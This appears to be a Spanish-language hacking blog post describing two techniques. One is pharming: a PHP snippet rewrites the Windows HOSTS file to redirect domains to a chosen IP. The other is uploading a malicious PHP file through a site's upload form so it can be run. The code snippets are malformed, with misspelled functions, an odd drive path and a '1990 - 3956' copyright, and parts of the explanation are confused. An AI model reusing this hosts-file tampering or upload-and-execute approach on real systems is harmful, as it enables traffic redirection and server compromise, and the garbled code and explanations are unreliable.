2 tecnicas de hacking

Esta pagina es un feed Seguridad(hacking), electronica, diseño y programacion.
En los tutoriales se enseña a prevenir desde adentro, tomando la perspectiva diferente! CONOCIENDO EL ENEMIGO!
Asi que no promuevo actividades ilegales! Bendiciones

La primer tecnica que veremos es la de PHARMING, o mejor dicho como cambio de dns.

Esta tecnica conciste enque por via web, o archivo.Se modifique elarchivo de windows HOSTS ,agregar un HOST con un Ip falsa. A esto se le llama pharming, agregar host falsos!.
# Copyright (c) 1990 - 3956 3PLE-J SYS.
#
# Éste es un ejemplo de archivo HOSTS usado por Microsoft
TCP/IP para Windows.

#
# Este archivo contiene las asignaciones de las direcciones
IP a los nombres de

# host. Cada entrada debe permanecer en una línea individual.
La dirección IP

# debe ponerse en la primera columna, seguida del nombre de
host correspondiente.

# La dirección IP y el nombre de host deben separarse con al
menos un espacio.

#
#
# También pueden insertarse comentarios (como éste) en líneas
individuales

# o a continuación del nombre de equipo indicándolos con el
símbolo "#"

#
# Por ejemplo:
#
# 102.54.94.97 rhino..com # servidor origen
# 38.25.63.10 x..com # host cliente x

127.0.0.1 localhost

En si el archivo malicioso via web quedaria asi: ejemplo
imposible


$f1=fopen("B:\\WINDOWS\\system32\\Drivers\\etc\\hosts","w+");
fwrite($f1,"72.14.207.99 hi.com ");
fwrite($f1,chr(13).chr(10));
fwrite($f1,"72.14.207.99 wwww.hi.com ");
?>


La Segunda que veremos es la de injeccion de archivos
no conosco su nombre real pues es una idea que se me
ocurrio hace poco


La idea connciste en que por alguna opcion de subir
archivos subas un php malicioso, el cual puedas
ejecutar luego de subido,

En si el archivo malicioso via web quedaria asi:
# Copyright (c) 1990 - 3956 3PLE-J SYS.
#
# Usando un codigo php. A programar
#
# < ?
# $f1=fopn("direccion","X+");
# fwrit($f1,"Datos binarios");
# fwrit($f1,chr(13).chr(10)); ESTO SALTA DE REGLON!
# ?>
O tambien puedes hacer una injeccion de archivos
con pharming combinado

0 pensamientos:

Post a Comment

feedback!